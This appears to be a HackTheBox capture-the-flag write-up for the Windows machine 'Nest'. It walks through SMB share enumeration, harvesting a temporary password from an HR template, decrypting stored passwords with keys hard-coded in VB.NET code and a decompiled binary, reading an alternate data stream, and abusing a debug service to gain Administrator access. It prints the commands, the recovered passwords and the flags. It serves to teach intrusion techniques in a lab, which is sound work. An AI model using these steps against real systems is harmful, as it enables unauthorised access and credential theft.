HackTheBox - Nest
Summary
| Nest | |
|---|---|
| Difficulty: | Easy |
| OS: | Windows |
| Release date: | 25-01-2020 |
| Nest was an easy Windows machine with an accessible SMB share. Both user access and root access were obtained by reverse engineering a .NET binary, in combination with sensitive data found in files across SMB shares. | |
Foothold
An Nmap scan reveals SMB on port 445.
mick@kali:~/Documents/HackTheBox/Nest$ nmap -sV -sC -Pn -oN nmap_nest 10.10.10.178
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-04 19:57 CEST
Nmap scan report for 10.10.10.178
Host is up (0.030s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds?
Host script results:
|_clock-skew: 4m07s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-06-04T18:02:16
|_ start_date: 2020-06-04T16:27:42
Fortunately, anonymous access was enabled and I was able to get a share listing.
mick@kali:~/Documents/HackTheBox/Nest$ smbclient -L 10.10.10.178
Enter WORKGROUP\mick's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Data Disk
IPC$ IPC Remote IPC
Secure$ Disk
Users Disk
SMB1 disabled -- no workgroup available
User access
The “Data” share allowed anonymous access.
mick@kali:~/Documents/HackTheBox/Nest$ smbclient \\\\10.10.10.178\\Data
Enter WORKGROUP\mick's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Aug 8 00:53:46 2019
.. D 0 Thu Aug 8 00:53:46 2019
IT D 0 Thu Aug 8 00:58:07 2019
Production D 0 Mon Aug 5 23:53:38 2019
Reports D 0 Mon Aug 5 23:53:44 2019
Shared D 0 Wed Aug 7 21:07:51 2019
The only folder accessible, however, was “Shared”.
smb: \Shared\> ls
. D 0 Wed Aug 7 21:07:51 2019
.. D 0 Wed Aug 7 21:07:51 2019
Maintenance D 0 Wed Aug 7 21:07:32 2019
Templates D 0 Wed Aug 7 21:08:07 2019
Navigating into “Templates” and subsequently into “HR” reveals a text file named “Welcome Email.txt”.
smb: \Shared\Templates\HR\> ls
. D 0 Wed Aug 7 21:08:01 2019
.. D 0 Wed Aug 7 21:08:01 2019
Welcome Email.txt A 425 Thu Aug 8 00:55:36 2019
The file contains the following:
We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME>
You will find your home folder in the following location:
\\HTB-NEST\Users\<USERNAME>
If you have any issues accessing specific services or workstations, please inform the
IT department and use the credentials below until all systems have been set up for you.
Username: TempUser
Password: welcome2019
Thank you
HR
Provided with a set of credentials, I was able to connect to a different SMB share. The first thing that came to mind, remembering the output received from listing available shares, is to connect to the “Users” share. Using the credentials, I successfully managed to get access to the “Users” share.
mick@kali:~/Documents/HackTheBox/Nest$ smbclient \\\\10.10.10.178\\Users -U TempUser%welcome2019
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Jan 26 00:04:21 2020
.. D 0 Sun Jan 26 00:04:21 2020
Administrator D 0 Fri Aug 9 17:08:23 2019
C.Smith D 0 Sun Jan 26 08:21:44 2020
L.Frost D 0 Thu Aug 8 19:03:01 2019
R.Thompson D 0 Thu Aug 8 19:02:50 2019
TempUser D 0 Thu Aug 8 00:55:56 2019
None of the folders were accessible unfortunately, except for “TempUsers” which only contained an empty text file. What did give further access though is connecting to the “Data” share with the credentials.
mick@kali:~/Documents/HackTheBox/Nest$ smbclient \\\\10.10.10.178\\Data -U TempUser%welcome2019
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Aug 8 00:53:46 2019
.. D 0 Thu Aug 8 00:53:46 2019
IT D 0 Thu Aug 8 00:58:07 2019
Production D 0 Mon Aug 5 23:53:38 2019
Reports D 0 Mon Aug 5 23:53:44 2019
Shared D 0 Wed Aug 7 21:07:51 2019
Unlike when logging in anonymously, I now had access to all folders in this share. The only folder that contained content besides “Shared” is “IT”.
smb: \IT\> ls
. D 0 Thu Aug 8 00:58:07 2019
.. D 0 Thu Aug 8 00:58:07 2019
Archive D 0 Tue Aug 6 00:33:58 2019
Configs D 0 Thu Aug 8 00:59:34 2019
Installs D 0 Thu Aug 8 00:08:30 2019
Reports D 0 Sun Jan 26 01:09:13 2020
Tools D 0 Tue Aug 6 00:33:43 2019
smb: \IT\> cd Configs
smb: \IT\Configs\> ls
. D 0 Thu Aug 8 00:59:34 2019
.. D 0 Thu Aug 8 00:59:34 2019
Adobe D 0 Wed Aug 7 21:20:09 2019
Atlas D 0 Tue Aug 6 13:16:18 2019
DLink D 0 Tue Aug 6 15:25:27 2019
Microsoft D 0 Wed Aug 7 21:23:26 2019
NotepadPlusPlus D 0 Wed Aug 7 21:31:37 2019
RU Scanner D 0 Wed Aug 7 22:01:13 2019
Server Manager D 0 Tue Aug 6 15:25:19 2019
While looking through the folders, several files caught my attention. Namely “NotepadPlusPlus/config.xml” and “RU Scanner/RU_config.xml”. The file “config.xml” contained the following:
<History nbMaxFile="15" inSubMenu="no" customLength="-1">
<File filename="C:\windows\System32\drivers\etc\hosts"/>
<File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt"/>
<File filename="C:\Users\C.Smith\Desktop\todo.txt"/>
</History>
Line 3 in the file gave away that Carl has a folder under “IT” in the “Secure$” share. The file “RU_config.xml” contained:
<?xml version="1.0" ?>
<ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<Port>389</Port>
<Username>c.smith</Username>
<Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password>
</ConfigFile>
It looked like this file contained credentials for the user “c.smith”, which I assumed to be the same user as Carl. Decoding the Base64 encoded password produced gibberish unfortunately. This told me that the password is encrypted and subsequently encoded in Base64. I started looking for a way to decrypt the password. Since the “NotepadPluspPlus/config.xml” file gave away that Carl has a folder in the “Secure$” share, I tried to connect to that share.
mick@kali:~/Documents/HackTheBox/Nest$ smbclient \\\\10.10.10.178\\Secure$ -U TempUser%welcome2019
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Aug 8 01:08:12 2019
.. D 0 Thu Aug 8 01:08:12 2019
Finance D 0 Wed Aug 7 21:40:13 2019
HR D 0 Thu Aug 8 01:08:11 2019
IT D 0 Thu Aug 8 12:59:25 2019
As TempUser I unfortunately didn’t have permission to list the contents of the IT folder. Luckily, though, access control is broken and I can directly navigate to “IT/Carl”.
smb: \IT\Carl\> ls
. D 0 Wed Aug 7 21:42:14 2019
.. D 0 Wed Aug 7 21:42:14 2019
Docs D 0 Wed Aug 7 21:44:00 2019
Reports D 0 Tue Aug 6 15:45:40 2019
VB Projects D 0 Tue Aug 6 16:41:55 2019
Navigating around the folders I found an interesting folder called “RUScanner”, which by name is similar to the “RU_config.xml” file from earlier that contained credentials.
smb: \IT\Carl\VB Projects\WIP\RU\RUScanner\> ls
. D 0 Thu Aug 8 00:05:54 2019
.. D 0 Thu Aug 8 00:05:54 2019
bin D 0 Wed Aug 7 22:00:11 2019
ConfigFile.vb A 772 Thu Aug 8 00:05:09 2019
Module1.vb A 279 Thu Aug 8 00:05:44 2019
My Project D 0 Wed Aug 7 22:00:11 2019
obj D 0 Wed Aug 7 22:00:11 2019
RU Scanner.vbproj A 4828 Fri Aug 9 17:37:51 2019
RU Scanner.vbproj.user A 143 Tue Aug 6 14:55:27 2019
SsoIntegration.vb A 133 Thu Aug 8 00:05:58 2019
Utils.vb A 4888 Wed Aug 7 21:49:35 2019
Transferring the files to my machine and checking them out revealed the following to me inside “Module1.vb”:
Module Module1
Sub Main()
Dim Config As ConfigFile = ConfigFile.LoadFromFile("RU_Config.xml")
Dim test As New SsoIntegration With {.Username = Config.Username, .Password = Utils.DecryptString(Config.Password)}
End Sub
End Module
This file loads a config file called “RU_Config.xml” (the one I discovered earlier) and decrypts the password inside that config file. The DecryptString function is called from Utils. The “Utils.vb” file, located in the same directory as “Module.vb”, contains the following code (some code has been omitted for brevity):
Imports System.Text
Imports System.Security.CryptographyPublic Class Utils
...
Public Shared Function DecryptString(EncryptedString As String) As String
If String.IsNullOrEmpty(EncryptedString) Then
Return String.Empty
Else
Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
End If
End Function
...
Public Shared Function Decrypt(ByVal cipherText As String,
ByVal passPhrase As String,
ByVal saltValue As String,
ByVal passwordIterations As Integer,
ByVal initVector As String,
ByVal keySize As Integer)
As String
...
Dim cipherTextBytes As Byte()
cipherTextBytes = Convert.FromBase64String(cipherText)
...
Return plainText
End Function
End Class
The code above was exactly what I needed to decrypt the password. The function DecryptString function takes a Base64 encoded string and passes that to the Decrypt function along with the password, salt and IV. Leaving the password, salt and the IV in the code is a mistake by the programmer. The salt and IV should be random for each encryption, and be included in the ciphertext. With this data I was able to decrypt the password I found in the configuration file. To do that, I wrote a VB.NET program that implemented the Decrypt function.
Imports System.Text
Imports System.Security.Cryptography
Module Module1
Sub Main()
Console.WriteLine("===================================")
Console.WriteLine("Decrypting Carl's password for Nest")
Console.WriteLine("===================================")
Console.WriteLine("Carl's password is:")
Console.WriteLine(Decrypt("fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=", "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256))
Console.ReadKey()
End Sub
Public Shared Function Decrypt(ByVal cipherText As String,
ByVal passPhrase As String,
ByVal saltValue As String,
ByVal passwordIterations As Integer,
ByVal initVector As String,
ByVal keySize As Integer)
As String
...
Dim cipherTextBytes As Byte()
cipherTextBytes = Convert.FromBase64String(cipherText)
...
Return plainText
End Function
End Module
The decryption was successful.
===================================
Decrypting Carl's password for Nest
===================================
Carl's password is:
xRxRxPANCAK3SxRxRx
The password ‘xRxRxPANCAK3SxRxRx’ provided me with user access to the machine.
mick@kali:~/Documents/HackTheBox/Nest$ smbclient \\\\10.10.10.178\\Users -U c.smith%xRxRxPANCAK3SxRxRx
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Jan 26 00:04:21 2020
.. D 0 Sun Jan 26 00:04:21 2020
Administrator D 0 Fri Aug 9 17:08:23 2019
C.Smith D 0 Sun Jan 26 08:21:44 2020
L.Frost D 0 Thu Aug 8 19:03:01 2019
R.Thompson D 0 Thu Aug 8 19:02:50 2019
TempUser D 0 Thu Aug 8 00:55:56 2019
smb: \> cd C.Smith
smb: \C.Smith\> ls
. D 0 Sun Jan 26 08:21:44 2020
.. D 0 Sun Jan 26 08:21:44 2020
HQK Reporting D 0 Fri Aug 9 01:06:17 2019
user.txt A 32 Fri Aug 9 01:05:24 2019
‘user.txt’:
cf71b25404be5d84fd827e05f426e987
Root access
The “HQK Reporting” folder contained some interesting files.
smb: \C.Smith\HQK Reporting\> ls
. D 0 Fri Aug 9 01:06:17 2019
.. D 0 Fri Aug 9 01:06:17 2019
AD Integration Module D 0 Fri Aug 9 14:18:42 2019
Debug Mode Password.txt A 0 Fri Aug 9 01:08:17 2019
HQK_Config_Backup.xml A 249 Fri Aug 9 01:09:05 2019
The folder “AD Integration Module” contained a file called “HqkLdap.exe”, which I downloaded for further inspection at a later time. The “Debug Mode password.txt” appears to be empty, but upon executing smbclient’s command allinfo I noticed that it contained an Alternate Data Stream.
As quoted from the Malwarebytes blog:
“Alternate Data Streams (ADS) are a file attribute only found on the NTFS file system. In this system a file is built up from a couple of attributes, one of them is $Data, aka the data attribute. Looking at the regular data stream of a text file there is no mystery. It simply contains the text inside the text file. But that is only the primary data stream. This one is sometimes referred to as the unnamed data stream since the name string of this attribute is empty ( “” ) . So any data stream that has a name is considered alternate.” - [https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/]
smb: \C.Smith\HQK Reporting\> get "Debug Mode Password.txt":Password
The command above retrieved the content from the ADS and revealed the password ‘WBQ201953D8w’.
Inside that same directory, ‘\C.Smith\HQK Reporting', a file called “HQK_Config_Backup.xml” was located. The file contained the following.
<?xml version="1.0" ?>
<ServiceSettings xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<Port>4386</Port>
<QueryDirectory>C:\Program Files\HQK\ALL QUERIES</QueryDirectory>
</ServiceSettings>
Seeing the specified port sparked my suspicion. Checking again reveals that there was indeed a service running on port 4386.
mick@kali:~/Documents/HackTheBox/Nest$ nmap -sV -sC -Pn -p 4386 10.10.10.178
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-04 20:08 CEST
Nmap scan report for 10.10.10.178
Host is up (0.028s latency).
PORT STATE SERVICE VERSION
4386/tcp open unknown
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe:
| Reporting Service V1.2
| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest, SIPOptions:
| Reporting Service V1.2
| Unrecognised command
| Help:
| Reporting Service V1.2
| This service allows users to run queries against databases using the legacy HQK format
| AVAILABLE COMMANDS ---
| LIST
| SETDIR <Directory_Name>
| RUNQUERY <Query_ID>
| DEBUG <Password>
|_ HELP <Command>
A connection to this service was made with telnet.
mick@kali:~/Documents/HackTheBox/Nest$ telnet 10.10.10.178 4386
>
The Nmap scan revealed the existence of a HELP command.
>HELP
This service allows users to run queries against databases using the legacy HQK format
--- AVAILABLE COMMANDS ---
LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
>
Using the DEBUG command with the password discovered from the ADS earlier provided me with additional commands. SHOWQUERY, SERVICE and SESSION were new.
>DEBUG WBQ201953D8w
Debug mode enabled. Use the HELP command to view additional commands that are now available
>HELP
This service allows users to run queries against databases using the legacy HQK format
--- AVAILABLE COMMANDS ---
LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
SERVICE
SESSION
SHOWQUERY <Query_ID>
While examining the SETDIR command I discovered the ability to traverse directories.
>HELP setdir
SETDIR <Directory>
Selects a new directory where query files can be run from. Use the LIST command to view available directory names (marked with [DIR]) that can be used with this command. The special characters ".." can be used to go back upto the previous directory.
Examples:
SETDIR MY QUERIES Changes to the directory named "MY QUERIES"
SETDIR .. Changes to the parent directory of the current directory
The SERVICE command revealed which directory the service was running queries from.
>SERVICE
--- HQK REPORTING SERVER INFO ---
Version: 1.2.0.0
Server Hostname: HTB-NEST
Server Process: "C:\Program Files\HQK\HqkSvc.exe"
Server Running As: Service_HQK
Initial Query Directory: C:\Program Files\HQK\ALL QUERIES
Since ‘HQK’ seemed like an interesting directory, I used the SETDIR command to go that directory and then used LIST.
>SETDIR ..
>LIST
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command
QUERY FILES IN CURRENT DIRECTORY
[DIR] ALL QUERIES
[DIR] LDAP
[DIR] Logs
[1] HqkSvc.exe
[2] HqkSvc.InstallState
[3] HQK_Config.xml
Current Directory: HQK
Going into the ‘LDAP’ directory I discovered 2 files. One of which I already discovered earlier (HqkLdap.exe) and a, presumably, configuration file for that executable.
>LIST
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command
QUERY FILES IN CURRENT DIRECTORY
[1] HqkLdap.exe
[2] Ldap.conf
Current Directory: LDAP
>SHOWQUERY 2
Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
User=Administrator
Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=
This password, like the other one for ‘c.smith’, was encrypted and Base64 encoded. I initially tried to decrypt it with the same code that worked for ‘c.smith’ but that was unsuccesful, which tells me that the parameters for decryption are different for this password. Remembering the executable ‘HqkLdap.exe’ discovered earlier, downloaded from ‘C.Smith\HQK Reporting’, I decided to decompile it using ILSpy. If ‘HqkLdap.exe’ is a .NET executable it will be easy to decompile. Decompilers often return nearly the exact same source code if it’s not obfuscated. After loading the executable into ILSpy and browsing the source code I found two functions that were almost identical to the encryption and decryption functions found earlier in ‘Utils.vb’, that were used to decrypt c.smith’s password.
The key, IV and salt were present in the source code again. This time however, there were 3 password iterations instead of 2. Replacing those values in the source code from earlier allowed for successful decryption.
Imports System.Text
Imports System.Security.Cryptography
Module Module1
Sub Main()
Console.WriteLine("===================================")
Console.WriteLine("Decrypting Administrator's password for Nest")
Console.WriteLine("===================================")
Console.WriteLine("Administrator's password is:")
Console.WriteLine(Decrypt("yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=", "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256))
Console.ReadKey()
End Sub
Public Shared Function Decrypt(ByVal cipherText As String,
ByVal passPhrase As String,
ByVal saltValue As String,
ByVal passwordIterations As Integer,
ByVal initVector As String,
ByVal keySize As Integer)
As String
...
Dim cipherTextBytes As Byte()
cipherTextBytes = Convert.FromBase64String(cipherText)
...
Return plainText
End Function
End Module
The decryption revealed the password ‘XtH4nkS4Pl4y1nGX’.
Decrypting Administrator's password for Nest
===================================
Administrator's password is:
XtH4nkS4Pl4y1nGX
This password provided Administrator acccess.
mick@kali:~/Documents/HackTheBox/Nest$ smbclient \\\\10.10.10.178\\C$ -U Administrator%XtH4nkS4Pl4y1nGX
Try "help" to get a list of possible commands.
smb: \> ls
$Recycle.Bin DHS 0 Tue Jul 14 04:34:39 2009
Boot DHS 0 Sat Jan 25 22:15:35 2020
bootmgr AHSR 383786 Sat Nov 20 05:40:08 2010
BOOTSECT.BAK AHSR 8192 Tue Aug 6 07:16:26 2019
Config.Msi DHS 0 Sat Jan 25 22:49:12 2020
Documents and Settings DHS 0 Tue Jul 14 07:06:44 2009
pagefile.sys AHS 2146881536 Thu Jun 4 18:27:39 2020
PerfLogs D 0 Tue Jul 14 05:20:08 2009
Program Files DR 0 Thu Aug 8 01:40:50 2019
Program Files (x86) DR 0 Tue Jul 14 07:06:53 2009
ProgramData DH 0 Mon Aug 5 22:24:41 2019
Recovery DHS 0 Mon Aug 5 22:22:25 2019
restartsvc.bat A 33 Thu Aug 8 01:43:09 2019
Shares D 0 Tue Aug 6 15:59:55 2019
System Volume Information DHS 0 Tue Aug 6 06:17:38 2019
Users DR 0 Thu Aug 8 19:19:40 2019
Windows D 0 Sat Jan 25 22:22:42 2020
smb: \> cd Users\Administrator\Desktop
smb: \Users\Administrator\Desktop\> ls
. DR 0 Sun Jan 26 08:20:50 2020
.. DR 0 Sun Jan 26 08:20:50 2020
desktop.ini AHS 282 Sat Jan 25 23:02:44 2020
root.txt A 32 Tue Aug 6 00:27:26 2019
‘root.txt’:
6594c2eb084bc0f08a42f0b94b878c41